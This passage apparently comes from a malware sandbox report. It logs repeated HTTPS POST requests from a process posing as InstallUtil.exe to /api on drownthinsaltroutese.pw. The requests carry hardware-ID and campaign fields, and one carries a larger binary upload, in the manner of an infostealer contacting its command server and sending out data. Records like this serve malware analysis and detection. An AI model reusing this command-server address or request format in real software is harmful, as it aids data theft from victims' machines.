                                                                                                                                                                    2024-01-07 04:29:56 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:57 UTC1337INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=4u35iqm81adtpn8jgkge0gvsdt; expires=Wed, 01-May-2024 22:16:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:56 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MccQArAAkDm5FDy%2F0bKKXMX7wgOjCPWkRHsJRI3LjgD6T%2BbFa7u2GXo5Xa%2BrYoaHwl%2F4sWDwneE6oFx5q8OkUus4CBFkLX6GOzdHUvcKGE8XD1TTNFVwSGZBKdC8uSVs%2Fgowb0cT7CarkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419766dbaa6c44a-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:57 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.449760172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:57 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:57 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:57 UTC1339INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=mb73438p1k48t3vedncfffn80l; expires=Wed, 01-May-2024 22:16:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:57 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:57 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:57 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k9pw3VsM7GilQb50wXcvS6rwB%2B4n5qkntQbxAribglyTVc%2BP%2BPcLeuMqawS%2BJeaSNk4w%2FEVBQRY39hbt8tvUfUgw9BoKf07GX5duU%2FfcNUBHF7AqJM76hACLYAKTmdSzkDNcojNTPMKaJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197671ade4c330-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:57 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.449762172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:57 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:57 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:58 UTC1331INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=9t7n9gavd7jnf9didtcggaq0cc; expires=Wed, 01-May-2024 22:16:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AV4eP9rr6sJ12HzEAaqBoDpr7E4grEG7Tk%2BHwXhU10tz41Qhbx5cJDT3nJYgbjx6heS2YuAkxoqg9BJVEYok71IKQueaYezNZQyki2nqLg9gUt3VtjYC%2F2B0lhA7B2GOtqku8TAU422tDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197675bec34255-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:58 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.449764172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:58 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 629
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:58 UTC629OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:58 UTC1333INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=cnan76rhsecduh5ccg6jo9ohrn; expires=Wed, 01-May-2024 22:16:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:58 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OajPZ4gkU0NG9blLghDSiCfn95oGfYbQeo9LLtcMyXNfc6n5UfmRAlbJ5tu588NVKreCqqfMABrQTxXuc%2FsOToeyXpygVszAx8aKwWM0nqVdnX%2FOY0idKgak3MErmMfmRlucP%2B9stlxntw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419767a0b8942e5-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:58 UTC28INData Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a
                                                                                                                                                                    Data Ascii: 16Debug data is disabled
                                                                                                                                                                    2024-01-07 04:29:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.449765172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:29:59 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 20435
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:29:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:29:59 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                                                                                                                                                    Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                    2024-01-07 04:29:59 UTC1333INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=b2umre865sfavi2q6d7h52dsru; expires=Wed, 01-May-2024 22:16:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:29:59 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:29:59 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:29:59 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kDzcYVM1tV6pQpmAymkP0I3m3E3DrkYkASu6%2FUxtNgmNDvoP3JUax7fKCHvFipqu2gIGc%2BLlss2jCJh2L4cj5Y%2FUvsAcWHzsMGKKlIsTBAmlDitftcPEYkRwugtSPBHe4NotqCHlnBLqIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419767dae8543bf-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:29:59 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 0d 0a
                                                                                                                                                                    Data Ascii: 11ok 191.96.227.176
                                                                                                                                                                    2024-01-07 04:29:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.449769172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:30:03 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 5436
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:30:03 UTC5436OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:30:03 UTC1335INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=onjpuf37lgcojg9fefvmb0a8ol; expires=Wed, 01-May-2024 22:16:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:30:03 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:30:03 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:30:03 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=epqdxwJxD7FpqxzZjHy0CY9piVdWv%2B7VUYyV2AdfA8AYHQI8%2FrU4%2FxL9EAnbdUbbbSaNDFIB0i7SBv1xQ0SotpLHLGod5c8Q5D5aVaSANdxe58RM3YsslxcQ7j2fRtP2CL2jLcYr6q%2BtbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419769879a54299-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:30:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 0d 0a
                                                                                                                                                                    Data Ascii: 11ok 191.96.227.176
                                                                                                                                                                    2024-01-07 04:30:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    17192.168.2.449770172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
